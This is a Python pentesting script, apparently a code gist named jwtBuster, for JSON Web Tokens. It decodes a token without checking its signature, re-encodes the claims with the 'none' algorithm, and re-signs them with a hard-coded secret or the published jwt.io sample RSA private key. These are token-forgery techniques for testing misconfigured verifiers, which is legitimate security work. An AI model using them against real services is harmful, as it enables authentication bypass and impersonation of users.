Last active
October 20, 2021 11:05
For pentesting a JWT: fetches its body and type, and signs it with a random string or PEM file (depending on the type in use). Also returns a None-type JWT.
from sys import argv | |
import json | |
import jwt | |
# Fixed HMAC secret used by jwtEncodingEncryption() for the HS256/HS384/HS512
# branches. It is a hard-coded constant, not a value generated per run.
JWTSECRET = "jwtSecretKeyEncryption"

# RSA private key used by jwtEncodingEncryption() for the RS256/RS384/RS512
# branches. Per the author's trailing comment it is the sample key from jwt.io,
# i.e. a published key: a verifier that accepts a token signed with it is
# configured with a key pair anyone can obtain.
PRIVATEKEY = """-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAnzyis1ZjfNB0bBgKFMSvvkTtwlvBsaJq7S5wA+kzeVOVpVWw
kWdVha4s38XM/pa/yr47av7+z3VTmvDRyAHcaT92whREFpLv9cj5lTeJSibyr/Mr
m/YtjCZVWgaOYIhwrXwKLqPr/11inWsAkfIytvHWTxZYEcXLgAXFuUuaS3uF9gEi
NQwzGTU1v0FqkqTBr4B8nW3HCN47XUu0t8Y0e+lf4s4OxQawWD79J9/5d3Ry0vbV
3Am1FtGJiJvOwRsIfVChDpYStTcHTCMqtvWbV6L11BWkpzGXSW4Hv43qa+GSYOD2
QU68Mb59oSk2OB+BtOLpJofmbGEGgvmwyCI9MwIDAQABAoIBACiARq2wkltjtcjs
kFvZ7w1JAORHbEufEO1Eu27zOIlqbgyAcAl7q+/1bip4Z/x1IVES84/yTaM8p0go
amMhvgry/mS8vNi1BN2SAZEnb/7xSxbflb70bX9RHLJqKnp5GZe2jexw+wyXlwaM
+bclUCrh9e1ltH7IvUrRrQnFJfh+is1fRon9Co9Li0GwoN0x0byrrngU8Ak3Y6D9
D8GjQA4Elm94ST3izJv8iCOLSDBmzsPsXfcCUZfmTfZ5DbUDMbMxRnSo3nQeoKGC
0Lj9FkWcfmLcpGlSXTO+Ww1L7EGq+PT3NtRae1FZPwjddQ1/4V905kyQFLamAA5Y
lSpE2wkCgYEAy1OPLQcZt4NQnQzPz2SBJqQN2P5u3vXl+zNVKP8w4eBv0vWuJJF+
hkGNnSxXQrTkvDOIUddSKOzHHgSg4nY6K02ecyT0PPm/UZvtRpWrnBjcEVtHEJNp
bU9pLD5iZ0J9sbzPU/LxPmuAP2Bs8JmTn6aFRspFrP7W0s1Nmk2jsm0CgYEAyH0X
+jpoqxj4efZfkUrg5GbSEhf+dZglf0tTOA5bVg8IYwtmNk/pniLG/zI7c+GlTc9B
BwfMr59EzBq/eFMI7+LgXaVUsM/sS4Ry+yeK6SJx/otIMWtDfqxsLD8CPMCRvecC
2Pip4uSgrl0MOebl9XKp57GoaUWRWRHqwV4Y6h8CgYAZhI4mh4qZtnhKjY4TKDjx
QYufXSdLAi9v3FxmvchDwOgn4L+PRVdMwDNms2bsL0m5uPn104EzM6w1vzz1zwKz
5pTpPI0OjgWN13Tq8+PKvm/4Ga2MjgOgPWQkslulO/oMcXbPwWC3hcRdr9tcQtn9
Imf9n2spL/6EDFId+Hp/7QKBgAqlWdiXsWckdE1Fn91/NGHsc8syKvjjk1onDcw0
NvVi5vcba9oGdElJX3e9mxqUKMrw7msJJv1MX8LWyMQC5L6YNYHDfbPF1q5L4i8j
8mRex97UVokJQRRA452V2vCO6S5ETgpnad36de3MUxHgCOX3qL382Qx9/THVmbma
3YfRAoGAUxL/Eu5yvMK8SAt/dJK6FedngcM3JEFNplmtLYVLWhkIlNRGDwkg3I5K
y18Ae9n7dHVueyslrb6weq7dTkYDi3iOYRW8HRkIQh06wEdbxt0shTzAJvvCQfrB
jg/3747WSsf/zBTcHihTRBdAv6OmdhV4/dD5YBfLAkLrd+mX7iE=
-----END RSA PRIVATE KEY-----"""  # Key taken from jwt.io
# Free-standing notes string (it follows the constants, so it is not the module
# docstring and nothing reads it at runtime).
# NOTE(review): "encrypt" in these notes refers to signing; the HS*/RS* branches
# in jwtEncodingEncryption() produce signed tokens, and the payload stays readable.
# NOTE(review): the list mentions HS128, but jwtEncodingEncryption() has branches
# only for HS256/HS384/HS512 and RS256/RS384/RS512.
"""
ToDos
- Read some articles and find other ways to encode/encrypt/test the token
ToDos Done
- Print the JWT
- Print the decoded JWT
- Find the Type of Encryption/Encoding being done in the Token
- `Encode` the JWT token with None type
- Find the encoding/encryption mechanism and encrypt the token specific to that
- Encrypt the JWT token with HS128
- Encrypt the JWT token with HS256
- Encrypt the JWT token with RS256
- Encrypt the JWT token with RS512
Member:
- Do try other encryption types' tokens too, don't just use the same type always! (hooman specific)
"""
def printData(heading, data):
    """Print *data* under a ``[#] heading`` banner framed by 30-dash rules.

    Args:
        heading: Text shown after the ``[#]`` marker.
        data: Any object; it is rendered with ``print``'s normal ``str`` conversion.
    """
    rule = "-" * 30
    # One print call emits the same six lines the banner consists of:
    # rule, heading, rule, data, rule, and a trailing blank line.
    print(rule, f"[#] {heading}", rule, data, rule, "", sep="\n")
def decodeJWT(token):
    """Decode *token* without verifying its signature and return the claims as JSON text.

    The claims are printed via printData() and returned as a 4-space-indented
    JSON string. Because the signature is not checked, the returned claims are
    whatever the token's sender wrote and carry no authenticity guarantee.

    Args:
        token: Encoded JWT string.

    Returns:
        The decoded payload serialised with ``json.dumps(..., indent=4)``.
    """
    # NOTE(review): `verify=False` is the PyJWT 1.x keyword; PyJWT 2.x expects
    # options={"verify_signature": False} instead — confirm the installed version.
    claims = jwt.decode(token, verify=False)
    prettyClaims = json.dumps(claims, indent=4)
    printData('Decoded JWT Data', prettyClaims)
    return prettyClaims
def JWTHeader(token):
    """Read the token's header without verification, print it, and return it.

    Args:
        token: Encoded JWT string.

    Returns:
        A ``(alg, header)`` tuple: the header's ``alg`` value and the full
        header mapping.

    Raises:
        KeyError: If the header has no ``alg`` entry (raised by the lookup below).
    """
    # The header is taken as-is from the token; nothing here has been
    # authenticated, so `alg` is a sender-controlled value.
    header = jwt.get_unverified_header(token)
    printData("JWT Header", header)
    algorithm = header['alg']
    return algorithm, header
def encodeWithNONE(decodedJWT):
    """Re-encode the claims with ``algorithm=None`` and print the resulting token.

    The output is an unsigned token. A verifier that pins the algorithms it
    accepts rejects such a token; one that trusts the token's own ``alg``
    header does not, which is the misconfiguration this output is meant to
    test for.

    Args:
        decodedJWT: JSON text of the claims, as returned by decodeJWT().

    Returns:
        None. The token is only printed.
    """
    claims = json.loads(decodedJWT)
    # NOTE(review): calling .decode() assumes jwt.encode() returns bytes
    # (PyJWT 1.x); PyJWT 2.x returns str — confirm the installed version.
    unsignedToken = jwt.encode(claims, key='', algorithm=None).decode()
    printData("JWT encoded token with type `None`", unsignedToken)
def jwtEncodingEncryption(algo, body):
    """Re-sign the claims with the algorithm named by *algo* and print the token.

    HS256/HS384/HS512 are signed with the module-level JWTSECRET;
    RS256/RS384/RS512 are signed with the module-level PRIVATEKEY. Any other
    value prints a "no module" message instead of a token.

    Args:
        algo: Algorithm name; main() passes the token header's ``alg`` value.
        body: JSON text of the claims, as returned by decodeJWT().

    Returns:
        None. The result is only printed.
    """
    # Tuple membership compares with ==, like the if/elif chain it replaces.
    if algo in ('HS256', 'HS384', 'HS512'):
        signingKey = JWTSECRET
    elif algo in ('RS256', 'RS384', 'RS512'):
        signingKey = PRIVATEKEY
    else:
        signingKey = None

    if signingKey is None:
        encryptedToken = "[!] This token doesn't has any module currently, please file a issue against this! :)"
    else:
        # The body is parsed only when a supported algorithm was matched.
        # NOTE(review): .decode() assumes jwt.encode() returns bytes (PyJWT 1.x);
        # PyJWT 2.x returns str — confirm the installed version.
        claims = json.loads(body)
        encryptedToken = jwt.encode(claims, signingKey, algorithm=algo).decode()

    printData(f"JWT encoded token with type `{algo}`", f"{encryptedToken}")
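def main():
    """Run the full inspection on the token given as the first CLI argument.

    Prints the raw token, its unverified header, its unverified claims, an
    ``algorithm=None`` re-encoding, and a re-signed token using the algorithm
    named in the header.

    Raises:
        SystemExit: With a usage message when no token argument was supplied
            (previously this surfaced as an IndexError traceback).
    """
    if len(argv) < 2:
        raise SystemExit('Usage: python3 jwtBuster.py "token"')

    jwtToken = argv[1]
    printData('JWT Token', jwtToken)

    # JWTHeader() returns (alg, header); only the alg value is used below.
    JWTheaders = JWTHeader(jwtToken)
    decodedJWT = decodeJWT(jwtToken)

    encodeWithNONE(decodedJWT)
    jwtEncodingEncryption(JWTheaders[0], decodedJWT)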
# Run main() only when the file is executed as a script, not when imported.
if __name__ == '__main__':
    main()
What does it do?
`Encode` the JWT token with None type

Run with:
python3 jwtBuster.py "token"